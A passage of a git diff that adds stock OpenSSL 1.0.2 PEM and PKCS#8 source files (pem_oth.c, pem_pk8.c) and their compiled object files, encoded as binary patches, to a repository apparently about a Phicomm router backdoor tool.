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
LF-d7uto;82_IWNe

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_oth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_oth.c
new file mode 100644
index 0000000..1dd3bd7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_oth.c
@@ -0,0 +1,86 @@
+/* crypto/pem/pem_oth.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+/* Handle 'other' PEMs: not private keys */
+
+void *PEM_ASN1_read_bio(d2i_of_void *d2i, const char *name, BIO *bp, void **x,
+                        pem_password_cb *cb, void *u)
+{
+    const unsigned char *p = NULL;
+    unsigned char *data = NULL;
+    long len;
+    char *ret = NULL;
+
+    if (!PEM_bytes_read_bio(&data, &len, NULL, name, bp, cb, u))
+        return NULL;
+    p = data;
+    ret = d2i(x, &p, len);
+    if (ret == NULL)
+        PEMerr(PEM_F_PEM_ASN1_READ_BIO, ERR_R_ASN1_LIB);
+    OPENSSL_free(data);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_oth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_oth.o
new file mode 100644
index 0000000000000000000000000000000000000000..154da1b71adfc164f884bf63dbdb135a3de8ad24
GIT binary patch
literal 1968
zcmbuAOHUI~6o79ZNL3iCaZ!VsSyTg2CLJ*`5@R}rwii>NmXe5y!?YbJfj*p06EH>>
z1mmO<-TDt)`2$>FjU>c{iQ*q{VGIisqwds*=g!<qhskuKC%HZ6d~+Um?qhmCo=SK<
z9>m0hE~A#mC_+_#%Z{366m_F6^yARUpHg<j_#PKOO=9D1%6LD4jbC`>3tzwu|EXSx
z#l~<rBsTGy9uDHQyWs%d^oL0eyg3{W5F;&J9W`E!81KZbZQ@^_T5akQZop&Q$U>I!
z85>`*;ScY87%?{RYO{VUE;hwCFS;RmeGYzJ?uQ>U88@H>wV-hU4_MRCJ1n@e!KaLm
zH>RbVuTgSnXprxn%+<?!oxdmy2$6pALfv%5d*>oT<b0onp|~kz8G<l6U?j&Tkr$yR
zVLli{j#>(N?qrZ>Dd_3x>I^)A1-%6PIDNKGbb<>$@+P^^17DKkSNusXy2#-emmcG=
z#6`WgIDVK5Nn9|-1!$V9B75aW-*(&{`doLC%$3b{Z<Y@#xrq<$bHh-jvkiBjvd>(#
zy(tI5Jz|@uxi-K~z#!}FlmP&4Jkf?{+whq-997klT+xd{9;M@>vNSO!%9^Sa<lKA(
z$;s4sOiIb)iNr)aD`%xxDlVIGxn*6gwF2Xrj9jhjvZ`qn4Gm?c(%Er&R#R0Z%Qaoe
zFUa}gf;_9tFTylT$xuypfUL>y9ZMeDc$bYowQ+I>Sp0Jv=WLv(9L_5_vn>&7%OzdO
zA)%&gmM$_&Qx_FMSC@1o6ck-SLatUrLcUTesbyg0imnQ92l~x7qW)aDE>yKjRn_!m
zB$yS{BD}g%Qd>R$!{Q;AoO$Poi~=LV&X46;vCJmA2L@T=C=9ziq*r2w!ULd5A9j*M
zl%J;Dd4vAY=T1dx*ySuZq~^coi;zodMqt>5^*>{WV6*;A589YLw2uYYp-b!)VC2^C
zIYZz_Xg&|NUD*0DmIH%?I`h*s{~8OV+L=EM+-?81>4LI-BKt>jSw7=#y-BNQw11Im
natFyjiZh=u=iUKAK?-jZ$0oGgE;$UATR!{r?tTzxhBN;!1!>m%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pk8.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pk8.c
new file mode 100644
index 0000000..b98c76c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pk8.c
@@ -0,0 +1,257 @@
+/* crypto/pem/pem_pkey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs12.h>
+#include <openssl/pem.h>
+
+static int do_pk8pkey(BIO *bp, EVP_PKEY *x, int isder,
+                      int nid, const EVP_CIPHER *enc,
+                      char *kstr, int klen, pem_password_cb *cb, void *u);
+static int do_pk8pkey_fp(FILE *bp, EVP_PKEY *x, int isder,
+                         int nid, const EVP_CIPHER *enc,
+                         char *kstr, int klen, pem_password_cb *cb, void *u);
+
+/*
+ * These functions write a private key in PKCS#8 format: it is a "drop in"
+ * replacement for PEM_write_bio_PrivateKey() and friends. As usual if 'enc'
+ * is NULL then it uses the unencrypted private key form. The 'nid' versions
+ * uses PKCS#5 v1.5 PBE algorithms whereas the others use PKCS#5 v2.0.
+ */
+
+int PEM_write_bio_PKCS8PrivateKey_nid(BIO *bp, EVP_PKEY *x, int nid,
+                                      char *kstr, int klen,
+                                      pem_password_cb *cb, void *u)
+{
+    return do_pk8pkey(bp, x, 0, nid, NULL, kstr, klen, cb, u);
+}
+
+int PEM_write_bio_PKCS8PrivateKey(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                                  char *kstr, int klen,
+                                  pem_password_cb *cb, void *u)
+{
+    return do_pk8pkey(bp, x, 0, -1, enc, kstr, klen, cb, u);
+}
+
+int i2d_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                            char *kstr, int klen,
+                            pem_password_cb *cb, void *u)
+{
+    return do_pk8pkey(bp, x, 1, -1, enc, kstr, klen, cb, u);
+}
+
+int i2d_PKCS8PrivateKey_nid_bio(BIO *bp, EVP_PKEY *x, int nid,
+                                char *kstr, int klen,
+                                pem_password_cb *cb, void *u)
+{
+    return do_pk8pkey(bp, x, 1, nid, NULL, kstr, klen, cb, u);
+}
+
+static int do_pk8pkey(BIO *bp, EVP_PKEY *x, int isder, int nid,
+                      const EVP_CIPHER *enc, char *kstr, int klen,
+                      pem_password_cb *cb, void *u)
+{
+    X509_SIG *p8;
+    PKCS8_PRIV_KEY_INFO *p8inf;
+    char buf[PEM_BUFSIZE];
+    int ret;
+    if (!(p8inf = EVP_PKEY2PKCS8(x))) {
+        PEMerr(PEM_F_DO_PK8PKEY, PEM_R_ERROR_CONVERTING_PRIVATE_KEY);
+        return 0;
+    }
+    if (enc || (nid != -1)) {
+        if (!kstr) {
+            if (!cb)
+                klen = PEM_def_callback(buf, PEM_BUFSIZE, 1, u);
+            else
+                klen = cb(buf, PEM_BUFSIZE, 1, u);
+            if (klen <= 0) {
+                PEMerr(PEM_F_DO_PK8PKEY, PEM_R_READ_KEY);
+                PKCS8_PRIV_KEY_INFO_free(p8inf);
+                return 0;
+            }
+
+            kstr = buf;
+        }
+        p8 = PKCS8_encrypt(nid, enc, kstr, klen, NULL, 0, 0, p8inf);
+        if (kstr == buf)
+            OPENSSL_cleanse(buf, klen);
+        PKCS8_PRIV_KEY_INFO_free(p8inf);
+        if (isder)
+            ret = i2d_PKCS8_bio(bp, p8);
+        else
+            ret = PEM_write_bio_PKCS8(bp, p8);
+        X509_SIG_free(p8);
+        return ret;
+    } else {
+        if (isder)
+            ret = i2d_PKCS8_PRIV_KEY_INFO_bio(bp, p8inf);
+        else
+            ret = PEM_write_bio_PKCS8_PRIV_KEY_INFO(bp, p8inf);
+        PKCS8_PRIV_KEY_INFO_free(p8inf);
+        return ret;
+    }
+}
+
+EVP_PKEY *d2i_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY **x, pem_password_cb *cb,
+                                  void *u)
+{
+    PKCS8_PRIV_KEY_INFO *p8inf = NULL;
+    X509_SIG *p8 = NULL;
+    int klen;
+    EVP_PKEY *ret;
+    char psbuf[PEM_BUFSIZE];
+    p8 = d2i_PKCS8_bio(bp, NULL);
+    if (!p8)
+        return NULL;
+    if (cb)
+        klen = cb(psbuf, PEM_BUFSIZE, 0, u);
+    else
+        klen = PEM_def_callback(psbuf, PEM_BUFSIZE, 0, u);
+    if (klen <= 0) {
+        PEMerr(PEM_F_D2I_PKCS8PRIVATEKEY_BIO, PEM_R_BAD_PASSWORD_READ);
+        X509_SIG_free(p8);
+        return NULL;
+    }
+    p8inf = PKCS8_decrypt(p8, psbuf, klen);
+    X509_SIG_free(p8);
+    if (!p8inf)
+        return NULL;
+    ret = EVP_PKCS82PKEY(p8inf);
+    PKCS8_PRIV_KEY_INFO_free(p8inf);
+    if (!ret)
+        return NULL;
+    if (x) {
+        if (*x)
+            EVP_PKEY_free(*x);
+        *x = ret;
+    }
+    return ret;
+}
+
+#ifndef OPENSSL_NO_FP_API
+
+int i2d_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                           char *kstr, int klen, pem_password_cb *cb, void *u)
+{
+    return do_pk8pkey_fp(fp, x, 1, -1, enc, kstr, klen, cb, u);
+}
+
+int i2d_PKCS8PrivateKey_nid_fp(FILE *fp, EVP_PKEY *x, int nid,
+                               char *kstr, int klen,
+                               pem_password_cb *cb, void *u)
+{
+    return do_pk8pkey_fp(fp, x, 1, nid, NULL, kstr, klen, cb, u);
+}
+
+int PEM_write_PKCS8PrivateKey_nid(FILE *fp, EVP_PKEY *x, int nid,
+                                  char *kstr, int klen,
+                                  pem_password_cb *cb, void *u)
+{
+    return do_pk8pkey_fp(fp, x, 0, nid, NULL, kstr, klen, cb, u);
+}
+
+int PEM_write_PKCS8PrivateKey(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                              char *kstr, int klen, pem_password_cb *cb,
+                              void *u)
+{
+    return do_pk8pkey_fp(fp, x, 0, -1, enc, kstr, klen, cb, u);
+}
+
+static int do_pk8pkey_fp(FILE *fp, EVP_PKEY *x, int isder, int nid,
+                         const EVP_CIPHER *enc, char *kstr, int klen,
+                         pem_password_cb *cb, void *u)
+{
+    BIO *bp;
+    int ret;
+    if (!(bp = BIO_new_fp(fp, BIO_NOCLOSE))) {
+        PEMerr(PEM_F_DO_PK8PKEY_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    ret = do_pk8pkey(bp, x, isder, nid, enc, kstr, klen, cb, u);
+    BIO_free(bp);
+    return ret;
+}
+
+EVP_PKEY *d2i_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY **x, pem_password_cb *cb,
+                                 void *u)
+{
+    BIO *bp;
+    EVP_PKEY *ret;
+    if (!(bp = BIO_new_fp(fp, BIO_NOCLOSE))) {
+        PEMerr(PEM_F_D2I_PKCS8PRIVATEKEY_FP, ERR_R_BUF_LIB);
+        return NULL;
+    }
+    ret = d2i_PKCS8PrivateKey_bio(bp, x, cb, u);
+    BIO_free(bp);
+    return ret;
+}
+
+#endif
+
+IMPLEMENT_PEM_rw(PKCS8, X509_SIG, PEM_STRING_PKCS8, X509_SIG)
+
+
+IMPLEMENT_PEM_rw(PKCS8_PRIV_KEY_INFO, PKCS8_PRIV_KEY_INFO, PEM_STRING_PKCS8INF,
+             PKCS8_PRIV_KEY_INFO)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pk8.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_pk8.o
new file mode 100644
index 0000000000000000000000000000000000000000..7a69289f6919df48a2b0d6a4f91b9be0569d982a
GIT binary patch
literal 7632
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
